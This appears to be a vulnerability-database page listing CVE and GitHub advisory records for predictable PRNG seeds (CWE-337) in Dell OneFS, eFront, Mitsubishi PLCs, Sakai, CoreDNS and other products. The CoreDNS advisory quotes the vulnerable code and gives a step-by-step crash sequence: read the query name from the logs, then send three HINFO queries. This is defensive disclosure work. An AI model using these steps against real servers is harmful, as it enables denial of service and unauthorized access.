CWE-337
AllowedPredictable Seed in Pseudo-Random Number Generator (PRNG)
Abstraction: Variant · Status: Draft
A Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time.
23 vulnerabilities reference this CWE, most recent first.
CVE-2022-26852 (GCVE-0-2022-26852)
Vulnerability from cvelistv5 – Published: 2022-04-08 19:50 – Updated: 2024-09-17 01:16- CWE-337 - Predictable Seed in Pseudo-Random Number Generator (PRNG)
| URL | Tags |
|---|---|
| https://www.dell.com/support/kbdoc/en-us/00019799… | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| Dell | PowerScale OneFS |
Affected:
unspecified , < 8.2.x, 9.0.0.x, 9.1.0.x, 9.2.0.x , 9.2.1.x, 9.3.0.x
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:18:37.716Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.dell.com/support/kbdoc/en-us/000197991/dell-emc-powerscale-onefs-security-update-for-multiple-component-vulnerabilities"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "PowerScale OneFS",
"vendor": "Dell",
"versions": [
{
"lessThan": "8.2.x, 9.0.0.x, 9.1.0.x, 9.2.0.x , 9.2.1.x, 9.3.0.x",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"datePublic": "2022-04-04T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Dell PowerScale OneFS, versions 8.2.x-9.3.x, contain a predictable seed in pseudo-random number generator. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to an account compromise."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-337",
"description": "CWE-337: Predictable Seed in Pseudo-Random Number Generator (PRNG)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-08T19:50:32.000Z",
"orgId": "c550e75a-17ff-4988-97f0-544cde3820fe",
"shortName": "dell"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.dell.com/support/kbdoc/en-us/000197991/dell-emc-powerscale-onefs-security-update-for-multiple-component-vulnerabilities"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secure@dell.com",
"DATE_PUBLIC": "2022-04-04",
"ID": "CVE-2022-26852",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "PowerScale OneFS",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "8.2.x, 9.0.0.x, 9.1.0.x, 9.2.0.x , 9.2.1.x, 9.3.0.x"
}
]
}
}
]
},
"vendor_name": "Dell"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Dell PowerScale OneFS, versions 8.2.x-9.3.x, contain a predictable seed in pseudo-random number generator. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to an account compromise."
}
]
},
"impact": {
"cvss": {
"baseScore": 8.1,
"baseSeverity": "High",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-337: Predictable Seed in Pseudo-Random Number Generator (PRNG)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.dell.com/support/kbdoc/en-us/000197991/dell-emc-powerscale-onefs-security-update-for-multiple-component-vulnerabilities",
"refsource": "MISC",
"url": "https://www.dell.com/support/kbdoc/en-us/000197991/dell-emc-powerscale-onefs-security-update-for-multiple-component-vulnerabilities"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c550e75a-17ff-4988-97f0-544cde3820fe",
"assignerShortName": "dell",
"cveId": "CVE-2022-26852",
"datePublished": "2022-04-08T19:50:32.150Z",
"dateReserved": "2022-03-10T00:00:00.000Z",
"dateUpdated": "2024-09-17T01:16:28.737Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2020-28597 (GCVE-0-2020-28597)
Vulnerability from cvelistv5 – Published: 2021-03-03 17:47 – Updated: 2024-08-04 16:40- CWE-337 - Predictable Seed in Pseudo-Random Number Generator (PRNG)
| URL | Tags |
|---|---|
| https://talosintelligence.com/vulnerability_repor… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T16:40:59.576Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1221"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Epignosis",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "Epignosis eFront LMS 5.2.17, Epignosis eFront LMS 5.2.21"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A predictable seed vulnerability exists in the password reset functionality of Epignosis EfrontPro 5.2.21. By predicting the seed it is possible to generate the correct password reset 1-time token. An attacker can visit the password reset supplying the password reset token to reset the password of an account of their choice."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-337",
"description": "CWE-337: Predictable Seed in Pseudo-Random Number Generator (PRNG)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-03-03T17:47:57.000Z",
"orgId": "b86d76f8-0f8a-4a96-a78d-d8abfc7fc29b",
"shortName": "talos"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1221"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "talos-cna@cisco.com",
"ID": "CVE-2020-28597",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Epignosis",
"version": {
"version_data": [
{
"version_value": "Epignosis eFront LMS 5.2.17, Epignosis eFront LMS 5.2.21"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A predictable seed vulnerability exists in the password reset functionality of Epignosis EfrontPro 5.2.21. By predicting the seed it is possible to generate the correct password reset 1-time token. An attacker can visit the password reset supplying the password reset token to reset the password of an account of their choice."
}
]
},
"impact": {
"cvss": {
"baseScore": 9.8,
"baseSeverity": "Critical",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-337: Predictable Seed in Pseudo-Random Number Generator (PRNG)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1221",
"refsource": "MISC",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1221"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "b86d76f8-0f8a-4a96-a78d-d8abfc7fc29b",
"assignerShortName": "talos",
"cveId": "CVE-2020-28597",
"datePublished": "2021-03-03T17:47:57.000Z",
"dateReserved": "2020-11-13T00:00:00.000Z",
"dateUpdated": "2024-08-04T16:40:59.576Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-15006 (GCVE-0-2016-15006)
Vulnerability from cvelistv5 – Published: 2023-01-02 07:59 – Updated: 2024-08-06 03:47- CWE-337 - Predictable Seed in Pseudo-Random Number Generator (PRNG)
| URL | Tags |
|---|---|
| https://vuldb.com/?id.217181 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.217181 | signaturepermissions-required |
| https://github.com/pfmonville/enigmaX/commit/922b… | patch |
| https://github.com/pfmonville/enigmaX/releases/tag/2.3 | patch |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T03:47:34.787Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vdb-entry",
"technical-description",
"x_transferred"
],
"url": "https://vuldb.com/?id.217181"
},
{
"tags": [
"signature",
"permissions-required",
"x_transferred"
],
"url": "https://vuldb.com/?ctiid.217181"
},
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://github.com/pfmonville/enigmaX/commit/922bf90ca14a681629ba0b807a997a81d70225b5"
},
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://github.com/pfmonville/enigmaX/releases/tag/2.3"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"modules": [
"Scrambling Table Handler"
],
"product": "enigmaX",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "2.0"
},
{
"status": "affected",
"version": "2.1"
},
{
"status": "affected",
"version": "2.2"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "tool",
"value": "VulDB GitHub Commit Analyzer"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability, which was classified as problematic, has been found in enigmaX up to 2.2. This issue affects the function getSeed of the file main.c of the component Scrambling Table Handler. The manipulation leads to predictable seed in pseudo-random number generator (prng). The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. Upgrading to version 2.3 is able to address this issue. The identifier of the patch is 922bf90ca14a681629ba0b807a997a81d70225b5. It is recommended to upgrade the affected component. The identifier VDB-217181 was assigned to this vulnerability."
},
{
"lang": "de",
"value": "Eine Schwachstelle wurde in enigmaX bis 2.2 entdeckt. Sie wurde als problematisch eingestuft. Es geht hierbei um die Funktion getSeed der Datei main.c der Komponente Scrambling Table Handler. Durch Manipulieren mit unbekannten Daten kann eine predictable seed in pseudo-random number generator (prng)-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk angegangen werden. Die Komplexit\u00e4t eines Angriffs ist eher hoch. Die Ausnutzbarkeit gilt als schwierig. Ein Aktualisieren auf die Version 2.3 vermag dieses Problem zu l\u00f6sen. Der Patch wird als 922bf90ca14a681629ba0b807a997a81d70225b5 bezeichnet. Als bestm\u00f6gliche Massnahme wird das Einspielen eines Upgrades empfohlen."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 3.7,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 3.7,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 2.6,
"vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-337",
"description": "CWE-337 Predictable Seed in Pseudo-Random Number Generator (PRNG)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-10-20T09:50:09.346Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.217181"
},
{
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.217181"
},
{
"tags": [
"patch"
],
"url": "https://github.com/pfmonville/enigmaX/commit/922bf90ca14a681629ba0b807a997a81d70225b5"
},
{
"tags": [
"patch"
],
"url": "https://github.com/pfmonville/enigmaX/releases/tag/2.3"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-01-02T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2023-01-02T00:00:00.000Z",
"value": "CVE reserved"
},
{
"lang": "en",
"time": "2023-01-02T01:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2023-01-26T21:05:30.000Z",
"value": "VulDB entry last update"
}
],
"title": "enigmaX Scrambling Table main.c getSeed prng seed"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2016-15006",
"datePublished": "2023-01-02T07:59:38.347Z",
"dateReserved": "2023-01-02T07:58:00.845Z",
"dateUpdated": "2024-08-06T03:47:34.787Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
GHSA-7XQ7-5JPJ-42X6
Vulnerability from github – Published: 2023-01-02 09:31 – Updated: 2023-01-09 18:30A vulnerability, which was classified as problematic, has been found in enigmaX up to 2.2. This issue affects the function getSeed of the file main.c of the component Scrambling Table Handler. The manipulation leads to predictable seed in pseudo-random number generator (prng). The attack may be initiated remotely. Upgrading to version 2.3 is able to address this issue. The name of the patch is 922bf90ca14a681629ba0b807a997a81d70225b5. It is recommended to upgrade the affected component. The identifier VDB-217181 was assigned to this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2016-15006"
],
"database_specific": {
"cwe_ids": [
"CWE-337"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-02T08:15:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability, which was classified as problematic, has been found in enigmaX up to 2.2. This issue affects the function getSeed of the file main.c of the component Scrambling Table Handler. The manipulation leads to predictable seed in pseudo-random number generator (prng). The attack may be initiated remotely. Upgrading to version 2.3 is able to address this issue. The name of the patch is 922bf90ca14a681629ba0b807a997a81d70225b5. It is recommended to upgrade the affected component. The identifier VDB-217181 was assigned to this vulnerability.",
"id": "GHSA-7xq7-5jpj-42x6",
"modified": "2023-01-09T18:30:18Z",
"published": "2023-01-02T09:31:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-15006"
},
{
"type": "WEB",
"url": "https://github.com/pfmonville/enigmaX/commit/922bf90ca14a681629ba0b807a997a81d70225b5"
},
{
"type": "WEB",
"url": "https://github.com/pfmonville/enigmaX/releases/tag/2.3"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.217181"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.217181"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9VV4-3CF7-MQQR
Vulnerability from github – Published: 2023-01-20 09:30 – Updated: 2023-01-30 21:30Predictable Seed in Pseudo-Random Number Generator (PRNG) vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series FX5U-xMy/z (x=32,64,80, y=T,R, z=ES,DS,ESS,DSS) with serial number 17X* or later, and versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5U-xMy/z (x=32,64,80, y=T,R, z=ES,DS,ESS,DSS) with serial number 179 and prior, and versions 1.074 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-xMy/z (x=32,64,96, y=T, z=D,DSS)) with serial number 17X or later, and versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-xMy/z (x=32,64,96, y=T, z=D,DSS)) with serial number 179* and prior, and versions 1.074 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MT/DS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MT/DSS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MR/DS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R00/01/02CPU all versions, Mitsubishi Electric Corporation MELSEC iQ-R Series R04/08/16/32/120(EN)CPU all versions allows a remote unauthenticated attacker to access the Web server function by guessing the random numbers used for authentication from several used random numbers.
{
"affected": [],
"aliases": [
"CVE-2022-40267"
],
"database_specific": {
"cwe_ids": [
"CWE-335",
"CWE-337"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-20T08:15:00Z",
"severity": "CRITICAL"
},
"details": "Predictable Seed in Pseudo-Random Number Generator (PRNG) vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series FX5U-xMy/z (x=32,64,80, y=T,R, z=ES,DS,ESS,DSS) with serial number 17X**** or later, and versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5U-xMy/z (x=32,64,80, y=T,R, z=ES,DS,ESS,DSS) with serial number 179**** and prior, and versions 1.074 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-xMy/z (x=32,64,96, y=T, z=D,DSS)) with serial number 17X**** or later, and versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-xMy/z (x=32,64,96, y=T, z=D,DSS)) with serial number 179**** and prior, and versions 1.074 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MT/DS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MT/DSS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MR/DS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R00/01/02CPU all versions, Mitsubishi Electric Corporation MELSEC iQ-R Series R04/08/16/32/120(EN)CPU all versions allows a remote unauthenticated attacker to access the Web server function by guessing the random numbers used for authentication from several used random numbers.",
"id": "GHSA-9vv4-3cf7-mqqr",
"modified": "2023-01-30T21:30:44Z",
"published": "2023-01-20T09:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40267"
},
{
"type": "WEB",
"url": "https://jvn.jp/vu/JVNVU99673580/index.html"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-23-017-02"
},
{
"type": "WEB",
"url": "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2022-019_en.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-GJPW-WR3X-Q236
Vulnerability from github – Published: 2025-08-06 21:31 – Updated: 2025-08-06 21:31Tigo Energy's CCA device is vulnerable to insecure session ID generation in their remote API. The session IDs are generated using a predictable method based on the current timestamp, allowing attackers to recreate valid session IDs. When combined with the ability to circumvent session ID requirements for certain commands, this enables unauthorized access to sensitive device functions on connected solar optimization systems.
{
"affected": [],
"aliases": [
"CVE-2025-7770"
],
"database_specific": {
"cwe_ids": [
"CWE-337"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-06T21:15:32Z",
"severity": "HIGH"
},
"details": "Tigo Energy\u0027s CCA device is vulnerable to insecure session ID generation in their remote API. The session IDs are generated using a predictable method based on the current timestamp, allowing attackers to recreate valid session IDs. When combined with the ability to circumvent session ID requirements for certain commands, this enables unauthorized access to sensitive device functions on connected solar optimization systems.",
"id": "GHSA-gjpw-wr3x-q236",
"modified": "2025-08-06T21:31:40Z",
"published": "2025-08-06T21:31:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7770"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-217-02"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-GR7H-XW4F-WH86
Vulnerability from github – Published: 2025-10-22 19:41 – Updated: 2025-10-24 18:27Impact
EncryptionUtilityServiceImpl initialized an AES256TextEncryptor password (serverSecretKey) using RandomStringUtils with the default java.util.Random. java.util.Random is a non‑cryptographic PRNG and can be predicted from limited state/seed information (e.g., start time window), substantially reducing the effective search space of the generated key. An attacker who can obtain ciphertexts (e.g., exported or at‑rest strings protected by this service) and approximate the PRNG seed can feasibly reconstruct the serverSecretKey and decrypt affected data.
Patches
SAK-49866 is patched in Sakai 23.5, 25.0, and trunk.
Credits
- Reported by Suraj Gangwar.
- Patched by Sam Ottenhoff (Longsight).
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.sakaiproject.kernel:sakai-kernel-impl"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "23.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-62710"
],
"database_specific": {
"cwe_ids": [
"CWE-337"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-22T19:41:49Z",
"nvd_published_at": "2025-10-22T23:15:34Z",
"severity": "MODERATE"
},
"details": "### Impact\nEncryptionUtilityServiceImpl initialized an AES256TextEncryptor password (serverSecretKey) using RandomStringUtils with the default java.util.Random. java.util.Random is a non\u2011cryptographic PRNG and can be predicted from limited state/seed information (e.g., start time window), substantially reducing the effective search space of the generated key. An attacker who can obtain ciphertexts (e.g., exported or at\u2011rest strings protected by this service) and approximate the PRNG seed can feasibly reconstruct the serverSecretKey and decrypt affected data.\n\n### Patches\nSAK-49866 is patched in Sakai 23.5, 25.0, and trunk. \n\n### Credits\n- Reported by [Suraj Gangwar](https://www.linkedin.com/in/surajgangwar?trk=contact-info).\n- Patched by Sam Ottenhoff (Longsight).",
"id": "GHSA-gr7h-xw4f-wh86",
"modified": "2025-10-24T18:27:44Z",
"published": "2025-10-22T19:41:49Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/sakaiproject/sakai/security/advisories/GHSA-gr7h-xw4f-wh86"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62710"
},
{
"type": "WEB",
"url": "https://github.com/sakaiproject/sakai/commit/bde070104b1de01f4a6458dca6d9e0880a0e3c04"
},
{
"type": "PACKAGE",
"url": "https://github.com/sakaiproject/sakai"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Sakai kernel-impl: predictable PRNG used to generate server\u2011side encryption key in EncryptionUtilityServiceImpl"
}
GHSA-H75P-J8XM-M278
Vulnerability from github – Published: 2026-03-06 22:08 – Updated: 2026-03-06 22:08Executive Summary
A Denial of Service vulnerability exists in CoreDNS's loop detection plugin that allows an attacker to crash the DNS server by sending specially crafted DNS queries. The vulnerability stems from the use of a predictable pseudo-random number generator (PRNG) for generating a secret query name, combined with a fatal error handler that terminates the entire process.
Technical Details
Vulnerability Description
The CoreDNS loop plugin is designed to detect forwarding loops by performing a self-test during server startup. The plugin generates a random query name (qname) using Go's math/rand package and sends an HINFO query to itself. If the server receives multiple matching queries, it assumes a forwarding loop exists and terminates.
The vulnerability arises from two design flaws:
-
Predictable PRNG Seed: The random number generator is seeded with
time.Now().UnixNano(), making the generated qname predictable if an attacker knows the approximate server start time. -
Fatal Error Handler: When the plugin detects what it believes is a loop (3+ matching HINFO queries), it calls
log.Fatalf()which invokesos.Exit(1), immediately terminating the process without cleanup or recovery.
Affected Code
File: plugin/loop/setup.go
// PRNG seeded with predictable timestamp
var r = rand.New(time.Now().UnixNano())
// Qname generation using two consecutive PRNG calls
func qname(zone string) string {
l1 := strconv.Itoa(r.Int())
l2 := strconv.Itoa(r.Int())
return dnsutil.Join(l1, l2, zone)
}
File: plugin/loop/loop.go
func (l *Loop) ServeDNS(ctx context.Context, w dns.ResponseWriter, r *dns.Msg) (int, error) {
// ... validation checks ...
if state.Name() == l.qname {
l.inc() // Increment counter
}
if l.seen() > 2 {
// FATAL: Terminates entire process
log.Fatalf("Loop (%s -> %s) detected for zone %q...", ...)
}
// ...
}
File: plugin/pkg/log/log.go
func Fatalf(format string, v ...any) {
logf(fatal, format, v...)
os.Exit(1) // Immediate process termination
}
Exploitation Window
The loop plugin remains active during the following conditions:
| Condition | Window Duration | Attack Feasibility |
|---|---|---|
| Healthy startup | 2 seconds | Requires precise timing |
| Self-test failure (upstream unreachable) | 30 seconds | HIGH - Extended window |
| Network degradation | Variable | Depends on retry behavior |
Attack Scenario
Primary Attack Vector: Network Degradation
When the upstream DNS server is unreachable (network partition, misconfiguration, outage), the loop plugin's self-test fails repeatedly. During this period:
- The loop plugin remains active for up to 30 seconds
- Each self-test attempt generates an HINFO query visible in CoreDNS logs
- An attacker with log access (shared Kubernetes cluster, centralized logging) can observe the qname
- The attacker sends 3 HINFO queries with the observed qname
- The server immediately crashes
┌──────────────────────────────────────────────────────────────────────────┐
│ ATTACK TIMELINE │
├──────────────────────────────────────────────────────────────────────────┤
│ T+0s CoreDNS starts, PRNG seeded with UnixNano() │
│ T+0.5s Self-test HINFO query sent (visible in logs) │
│ T+2s Self-test fails (upstream timeout) │
│ T+3s Retry #1 - counter resets, qname unchanged │
│ T+5s Retry #2 - attacker observes qname in logs │
│ T+5.1s ATTACKER: Send HINFO #1 → counter = 1 │
│ T+5.2s ATTACKER: Send HINFO #2 → counter = 2 │
│ T+5.3s ATTACKER: Send HINFO #3 → counter = 3 → os.Exit(1) │
│ T+5.3s SERVER CRASHES │
└──────────────────────────────────────────────────────────────────────────┘
Impact Assessment
Attack Requirements
| Requirement | Notes |
|---|---|
| Network Access | Must be able to send UDP packets to CoreDNS port |
| Log Access | Required to observe the qname (common in shared clusters) |
| Timing | Extended window during network degradation |
| Authentication | None required |
Real-World Impact
CoreDNS is the default DNS server for Kubernetes clusters. A successful attack would:
- Disruption: All DNS resolution fails within the cluster
- Cascading Failures: Services unable to discover each other
- Restart Loop: If attack persists, CoreDNS enters crash-restart cycle
- Data Plane Impact: Application-level failures across the cluster
References
- CoreDNS GitHub: https://github.com/coredns/coredns
- Loop Plugin Documentation: https://coredns.io/plugins/loop/
- Go math/rand Documentation: https://pkg.go.dev/math/rand
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-26018"
],
"database_specific": {
"cwe_ids": [
"CWE-337"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-06T22:08:22Z",
"nvd_published_at": "2026-03-06T16:16:10Z",
"severity": "HIGH"
},
"details": "## Executive Summary\n\nA Denial of Service vulnerability exists in CoreDNS\u0027s loop detection plugin that allows an attacker to crash the DNS server by sending specially crafted DNS queries. The vulnerability stems from the use of a predictable pseudo-random number generator (PRNG) for generating a secret query name, combined with a fatal error handler that terminates the entire process.\n\n---\n## Technical Details\n\n### Vulnerability Description\n\nThe CoreDNS `loop` plugin is designed to detect forwarding loops by performing a self-test during server startup. The plugin generates a random query name (`qname`) using Go\u0027s `math/rand` package and sends an HINFO query to itself. If the server receives multiple matching queries, it assumes a forwarding loop exists and terminates.\n\n**The vulnerability arises from two design flaws:**\n\n1. **Predictable PRNG Seed**: The random number generator is seeded with `time.Now().UnixNano()`, making the generated qname predictable if an attacker knows the approximate server start time.\n\n2. **Fatal Error Handler**: When the plugin detects what it believes is a loop (3+ matching HINFO queries), it calls `log.Fatalf()` which invokes `os.Exit(1)`, immediately terminating the process without cleanup or recovery.\n\n### Affected Code\n\n**File: `plugin/loop/setup.go`**\n```go\n// PRNG seeded with predictable timestamp\nvar r = rand.New(time.Now().UnixNano())\n\n// Qname generation using two consecutive PRNG calls\nfunc qname(zone string) string {\n l1 := strconv.Itoa(r.Int())\n l2 := strconv.Itoa(r.Int())\n return dnsutil.Join(l1, l2, zone)\n}\n```\n\n**File: `plugin/loop/loop.go`**\n```go\nfunc (l *Loop) ServeDNS(ctx context.Context, w dns.ResponseWriter, r *dns.Msg) (int, error) {\n // ... validation checks ...\n \n if state.Name() == l.qname {\n l.inc() // Increment counter\n }\n\n if l.seen() \u003e 2 {\n // FATAL: Terminates entire process\n log.Fatalf(\"Loop (%s -\u003e %s) detected for zone %q...\", ...)\n }\n \n // ...\n}\n```\n\n**File: `plugin/pkg/log/log.go`**\n```go\nfunc Fatalf(format string, v ...any) {\n logf(fatal, format, v...)\n os.Exit(1) // Immediate process termination\n}\n```\n\n### Exploitation Window\n\nThe loop plugin remains active during the following conditions:\n\n| Condition | Window Duration | Attack Feasibility |\n|-----------|-----------------|-------------------|\n| Healthy startup | 2 seconds | Requires 